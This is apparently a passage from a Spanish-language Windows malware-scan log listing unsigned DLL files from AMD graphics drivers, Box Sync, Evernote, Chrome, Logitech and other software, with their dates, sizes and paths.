2019-06-16 08:33 - 2019-06-16 08:33 - 000450048 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.8e996306#\f6f432d0e4b9ce6740dfb1c38ca33655\CLI.Aspect.CrossDisplay.Graphics.Dashboard.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000145920 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.a0ae52bc#\bc2a8d47c478c901691f26c2812e2b20\CLI.Aspect.DeviceLCD.Graphics.Shared.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000451584 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.acb9d930#\7da1ca704cc7b855a609103e61be3ec4\CLI.Aspect.DeviceProperty.Graphics.Shared.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000085504 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.ae5e117c#\122c0c6fd8f3ca783dddded75e2c3337\CLI.Aspect.DisplaysColour2.Graphics.Shared.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000066560 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.b0a7c1fb#\9f9ca1b9e4626e42f88e0525e9dfcb0f\CLI.Aspect.DisplaysOptions.Graphics.Dashboard.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000310272 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.c7aaa0f8#\1c8b25dae7f020b79b2ac84faee53d2b\CLI.Aspect.OverDrive5.Graphics.Shared.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000017920 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.c854b457#\07a74fdaa405ea5973aca1c7d94638f0\CLI.Aspect.HotkeysHandling.Graphics.Shared.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000267776 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.e8635fc7#\49832bbdd5aabf411f65cd727c9faf14\CLI.Aspect.InfoCentre.Graphics.Dashboard.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 003329024 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.e9fd7406#\6967d3fb8c6ab92626fb7de625d171a6\CLI.Aspect.Radeon3D.Graphics.Dashboard.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000236032 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.eda8935e#\f2483e255c6342388ef8e539ec452b40\CLI.Aspect.MMVideo.Graphics.Shared.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000046592 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.ef3eaa4d#\83bee7a8108dbb29da6565be5e4bb08f\CLI.Aspect.TransCode.Graphics.Runtime.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000050688 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Caste.A4.Runtime\f80f207b301e562c9ebe2e13c2cc8642\CLI.Caste.A4.Runtime.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000044544 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Caste.A4.Shared\cde01374ee409df31f29cbb9cc3c7aa0\CLI.Caste.A4.Shared.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000027648 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Caste.Af820fedc#\8119c6e2fd7a38858cbd386e39c4c25c\CLI.Caste.A4.Dashboard.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000044544 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Caste.F24de14fe#\f7617c5ed4c24dfebc8686b7f1475254\CLI.Caste.Fuel.Shared.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000304640 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Caste.F36b07a2b#\0722ddd57b262f997e8d949882476b1b\CLI.Caste.Fuel.Runtime.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000027648 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Caste.Ff3085433#\d8ca41794000e951fc84c433e1cdabbf\CLI.Caste.Fuel.Dashboard.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000038400 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Caste.G60338cc0#\c4611e99edfce0c7edbcaf39780d3ac5\CLI.Caste.Graphics.Runtime.Shared.Private.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 001530368 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Caste.Gd9d9b43b#\9e335d4408032183dc2d521802881732\CLI.Caste.Graphics.Dashboard.Shared.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000460800 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Caste.Gee7d2dbc#\6b051e2cafac1743b5b16b9ad9b07c9a\CLI.Caste.Graphics.Dashboard.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000044544 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Caste.H18c99613#\19dd0357b8d21782ccadd3e0b95c0e76\CLI.Caste.HydraVision.Runtime.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000030720 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Caste.H92ba4e46#\05e47259323523b28db2744f2bae1d82\CLI.Caste.HydraVision.Shared.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000025600 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Caste.Hbb906c0b#\e5682818021481fac0dfb9745c1745fd\CLI.Caste.HydraVision.Dashboard.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000030720 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Caste.Pac40511b#\7ab4cd73ef1ebc2520f175d0f4886515\CLI.Caste.Platform.Shared.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000043520 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Caste.Pdb36d56e#\b8a7c75556c7406201ada043eec9db30\CLI.Caste.Platform.Runtime.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000024064 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Caste.Pfeefa2b6#\c98d346750468061d88d8dafe292c2e1\CLI.Caste.Platform.Dashboard.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000013312 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Compone1b4a8c97#\f30b4f252db2f03136f4efb83b8cadb0\CLI.Component.Runtime.Shared.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000168960 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Compone29e547cc#\fd2f59c15a9dbeb99b02181a0723636c\CLI.Component.Dashboard.ProfileManager2.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000148992 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Compone59f353b4#\90a8579d137cfee6d7b84c9ce82023f9\CLI.Component.Runtime.Shared.Private.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000017408 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Componeb4d0485c#\bc95c11ac30e795bd7e1c821e03eea4e\CLI.Component.Runtime.Extension.EEU.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 001599488 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Componec89c3bec#\341efde17f17e3c1a1e18bc239f76c27\CLI.Component.Dashboard.Shared.Private.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000019968 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Componef1fd67b2#\1219eae70b7789dbf787e9b397b9be13\CLI.Component.Client.Shared.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000084992 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Componef4cf054f#\f3f736f2e75db8193783e9b207ff7088\CLI.Component.Dashboard.Shared.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000088576 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Foundat3d5d3945#\e7609ddef3ba85dee440db07c580b203\CLI.Foundation.Private.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000060928 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Foundat60cdf5df#\d0af68ccacd06c1db2f0533c822b0018\CLI.Foundation.XManifest.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000089088 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Foundat619559bd#\b86b9e823d3743534f71e168ddd03be4\CLI.Foundation.CoreAudioAPI.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000910336 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Foundatd3771151#\da84743dd1f1c84bb952be41da82bb56\CLI.Foundation.Client.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000295424 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Foundation\398d099a19038a152fe1c5b22940989b\CLI.Foundation.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000015872 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\DEM.Graphics\c6728f542422b72e471ff68009013b27\DEM.Graphics.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000037888 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\Fuel.Foundation\02b2c9bff795175485d41b0d8a7ad635\Fuel.Foundation.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000285696 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\LOG.Foundat03490438#\6fc122fc01d2ea94661cffdc77113202\LOG.Foundation.Implementation.ni.dll
2019-06-16 08:32 - 2019-06-16 08:32 - 000145920 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\LOG.Foundat5023f8e7#\7a62f369e20ef3597f95850ee3919e22\LOG.Foundation.Private.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000085504 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\LOG.Foundatcaafa75b#\54c446fdc54c828d21d303456e2cc78e\LOG.Foundation.Implementation.Private.ni.dll
2019-06-16 08:32 - 2019-06-16 08:32 - 000122368 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\LOG.Foundation\c626af4ea644977730c61a460283b7f4\LOG.Foundation.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000012800 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\MOM.Foundation\86c8e6e9396a3332cd811e4aac302dea\MOM.Foundation.ni.dll
2019-06-16 08:35 - 2019-06-16 08:35 - 000391680 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\MOM.Implementation\a75ecdd34428ce553bd9327b301013af\MOM.Implementation.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000055296 _____ (Advanced Micro Devices Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\NEWAEM.Foundation\39af583d6a79abd10ff005ffa843979d\NEWAEM.Foundation.ni.dll
2013-08-30 18:37 - 2013-08-30 18:37 - 000897024 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\atiacm64.dll
2013-08-30 18:37 - 2013-08-30 18:37 - 000004608 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\atiamesp.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000766464 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\ADL.Foundation\d0fb38ea6f6c533e2ee894338e3bf5ec\ADL.Foundation.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000245248 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\APM.Server\68cfae31a4e8dd334664b08100f327f0\APM.Server.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000289792 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.9b707b25#\d1bdf390432796f63155a1d9979f7d28\CLI.Aspect.DeviceProperty.Graphics.Runtime.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 001641984 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.aa59351a#\4109d26e83fcacba374007d2f1766da2\CLI.Aspect.DeviceProperty.Graphics.Dashboard.Shared.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000728064 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.e6d9f3a8#\cc3bf892b75a2f996879031f45df24cd\CLI.Aspect.DeviceDFP.Graphics.Dashboard.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 002518016 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Combine0616f305#\78db4292ed2b519c96afd6f751c26678\CLI.Combined.Graphics.Aspects1.Dashboard.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000964608 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Combine7332395e#\1cb117f57634f4338ea10b7e748abf45\CLI.Combined.Graphics.Aspects2.Runtime.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000133632 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Compone168638d1#\089b35e8487c44a29b304d89a4031e18\CLI.Component.Client.Shared.Private.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000227840 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Compone6692ca50#\941e4c7b5d31788313d3d308422cfc2c\CLI.Component.Runtime.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000896512 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Compone6bf88b08#\84114c0e27f2409c2eb2133e1076e780\CLI.Component.Dashboard.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000017920 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\DEM.Graphics.I0703\96b013f395a3507cee49bf11d88eefbd\DEM.Graphics.I0703.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000014336 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\DEM.Graphics.I0706\0a43fd64cdc2cae8b1aa86338b02ae69\DEM.Graphics.I0706.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000083456 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\DEM.Graphics.I0709\e3f51c3a0ac94506290f5640377b577f\DEM.Graphics.I0709.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000013312 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\DEM.Graphics.I0712\e696bb84c27f86ff3a3b9a8907e1d954\DEM.Graphics.I0712.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000018944 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\DEM.Graphics.I0804\5d417c1468d391ca6bf46fd8c1d970f2\DEM.Graphics.I0804.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000011264 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\DEM.Graphics.I0805\34ff948df907c790ad91fa28e1eb3dff\DEM.Graphics.I0805.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000011776 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\DEM.Graphics.I0812\e2bdd22eb73d81f6366d9fc759b63350\DEM.Graphics.I0812.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000014336 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\DEM.Graphics.I0906\7556b49b55c919541be18d2edd1bce54\DEM.Graphics.I0906.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000014848 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\DEM.Graphics.I0912\2ed5b437e167e6334ba3dd3451a6bb86\DEM.Graphics.I0912.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 000036352 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\DEM.Graphics.I1010\0bd75f108c4a66bf815c35fcfa5eec27\DEM.Graphics.I1010.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 001010688 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\Localizatio01dbc1c0#\16d0b0d16b039be95b9bedcb5fae8e90\Localization.Foundation.Private.ni.dll
2019-06-16 08:35 - 2019-06-16 08:35 - 000241152 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\ResourceMan446ca0e5#\b75daa2d9ff48a948e185a6a02c984f7\ResourceManagement.Foundation.Implementation.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000023552 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\ResourceManf163905a#\6f1e212fc8a7cf00f2d1f2dd5059e383\ResourceManagement.Foundation.Private.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000090112 _____ (Advanced Mirco Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Aspect.ec8786e5#\55d0726352075b44cbd7eed588c04798\CLI.Aspect.AMDHome.Graphics.Dashboard.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 002239488 _____ (Advanced Mirco Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Caste.G60a7b4d1#\01c31edfc3a01b4c5fd879118890be75\CLI.Caste.Graphics.Shared.ni.dll
2019-06-16 08:34 - 2019-06-16 08:34 - 002717696 _____ (Advanced Mirco Devices, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\CLI.Caste.G962aa464#\4c1d55cb31a64154df9a92b035595ca2\CLI.Caste.Graphics.Runtime.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000026112 _____ (ATI Technologies Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\DEM.Foundation\8e96b00aa2421f3cc9f527392518e79f\DEM.Foundation.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000117248 _____ (ATI Technologies Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\DEM.Graphics.I0601\9bafd18725d7d9febbaa41a769bd9047\DEM.Graphics.I0601.ni.dll
2013-06-07 20:20 - 2013-06-07 20:20 - 000010752 _____ (Box, Inc.) [Archivo no firmado] C:\Program Files\Box Sync\BoxCopyHookHandler.dll
2013-06-07 20:20 - 2013-06-07 20:20 - 000009216 _____ (Box, Inc.) [Archivo no firmado] C:\Program Files\Box Sync\BoxIconOverlayHandler.dll
2013-06-07 20:20 - 2013-06-07 20:20 - 000091136 _____ (Box, Inc.) [Archivo no firmado] C:\Program Files\Box Sync\BoxUtils.dll
2013-07-22 07:53 - 2013-07-22 07:53 - 000357888 _____ (Box, Inc.) [Archivo no firmado] C:\Windows\assembly\NativeImages_v2.0.50727_64\BoxUtils\9a29b41b9abee2609734711961700371\BoxUtils.ni.dll
2013-05-22 16:43 - 2013-05-22 16:43 - 000434688 _____ (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) [Archivo no firmado] C:\Program Files (x86)\Evernote\Evernote\Intl\EvernoteClipper.es-ES.dll
2012-07-06 06:43 - 2012-07-06 06:43 - 000284160 _____ (Evernote Corporation) [Archivo no firmado] C:\Program Files (x86)\Evernote\Evernote\encrashrep.dll
2012-09-08 12:16 - 2012-09-08 12:16 - 000258048 _____ (Evernote Corporation, 333 West Evelyn Avenue, Mountain View, CA 94041) [Archivo no firmado] C:\Program Files (x86)\Evernote\Evernote\LibPCRE.dll
2019-09-01 07:37 - 2019-09-01 07:55 - 062488048 _____ (Google LLC -> Google LLC) [Archivo no firmado] C:\Program Files (x86)\Google\Chrome\Application\76.0.3809.132\chrome.dll
2020-01-17 11:53 - 2020-01-17 11:53 - 062488048 _____ (Google LLC -> Google LLC) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication\76.0.3809.132\chrome.dll
2012-09-23 17:25 - 2010-09-23 22:02 - 000185856 _____ (Martin Prikryl) [Archivo no firmado] E:\Archivos de Programa\WinSCP\DragExt64.dll
2003-03-19 06:14 - 2003-03-19 06:14 - 000499712 _____ (Microsoft Corporation) [Archivo no firmado] C:\Program Files (x86)\Common Files\Ahead\Lib\MSVCP71.dll
2003-02-21 14:42 - 2003-02-21 14:42 - 000348160 _____ (Microsoft Corporation) [Archivo no firmado] C:\Program Files (x86)\Common Files\Ahead\Lib\MSVCR71.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 000332800 _____ (Microsoft) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W8090224c#\71d027f3c24988cc4b04bc4092e8c832\Microsoft.WindowsAPICodePack.ni.dll
2019-06-16 08:33 - 2019-06-16 08:33 - 002497536 _____ (Microsoft) [Archivo no firmado] C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wfbf9373c#\26e0d343f19ac80229199edc0b79998a\Microsoft.WindowsAPICodePack.Shell.ni.dll
2020-01-31 11:10 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-3TFQG.tmp\idp.dll
2020-01-31 11:10 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-6BAIV.tmp\idp.dll
2020-01-31 11:10 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-9SBJV.tmp\idp.dll
2020-01-31 11:10 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-AJVC4.tmp\idp.dll
2020-01-31 11:10 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-BLKKH.tmp\idp.dll
2020-01-31 11:10 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-BLKKI.tmp\idp.dll
2020-01-31 11:10 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-CD8CM.tmp\idp.dll
2020-01-31 11:10 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-CJT48.tmp\idp.dll
2020-01-31 11:10 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-FAB73.tmp\idp.dll
2020-01-31 11:10 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-HRQMA.tmp\idp.dll
2020-01-31 11:10 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-NSE98.tmp\idp.dll
2020-01-31 11:10 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-O6NNI.tmp\idp.dll
2020-01-31 11:10 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-RGEG7.tmp\idp.dll
2020-01-31 11:10 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-RLT00.tmp\idp.dll
2013-01-10 02:19 - 2013-01-10 02:19 - 000173568 _____ (Nokia Corporation and/or its subsidiary(-ies)) [Archivo no firmado] C:\Program Files\Logitech Gaming Software\imageformats\qjpeg4.dll
2013-01-10 02:19 - 2013-01-10 02:19 - 001807360 _____ (Nokia Corporation and/or its subsidiary(-ies)) [Archivo no firmado] C:\Program Files\Logitech Gaming Software\QtCLucene4.dll
2013-01-10 02:19 - 2013-01-10 02:19 - 003276288 _____ (Nokia Corporation and/or its subsidiary(-ies)) [Archivo no firmado] C:\Program Files\Logitech Gaming Software\QtCore4.dll
2013-01-10 02:19 - 2013-01-10 02:19 - 012168192 _____ (Nokia Corporation and/or its subsidiary(-ies)) [Archivo no firmado] C:\Program Files\Logitech Gaming Software\QtGui4.dll
2013-01-10 02:19 - 2013-01-10 02:19 - 000750080 _____ (Nokia Corporation and/or its subsidiary(-ies)) [Archivo no firmado] C:\Program Files\Logitech Gaming Software\QtHelp4.dll
2013-01-10 02:19 - 2013-01-10 02:19 - 001085952 _____ (Nokia Corporation and/or its subsidiary(-ies)) [Archivo no firmado] C:\Program Files\Logitech Gaming Software\QtNetwork4.dll
2013-01-10 02:19 - 2013-01-10 02:19 - 000841728 _____ (Nokia Corporation and/or its subsidiary(-ies)) [Archivo no firmado] C:\Program Files\Logitech Gaming Software\QtOpenGL4.dll
2013-01-10 02:19 - 2013-01-10 02:19 - 001990144 _____ (Nokia Corporation and/or its subsidiary(-ies)) [Archivo no firmado] C:\Program Files\Logitech Gaming Software\QtScript4.dll
2013-01-10 02:19 - 2013-01-10 02:19 - 000897024 _____ (Nokia Corporation and/or its subsidiary(-ies)) [Archivo no firmado] C:\Program Files\Logitech Gaming Software\QtSql4.dll
2013-01-10 02:19 - 2013-01-10 02:19 - 000539136 _____ (Nokia Corporation and/or its subsidiary(-ies)) [Archivo no firmado] C:\Program Files\Logitech Gaming Software\QtXml4.dll
2017-09-14 07:37 - 2017-09-14 07:37 - 000026112 _____ (The Qt Company Ltd) [Archivo no firmado] C:\ProgramData\MEGAsync\imageformats\qgif.dll
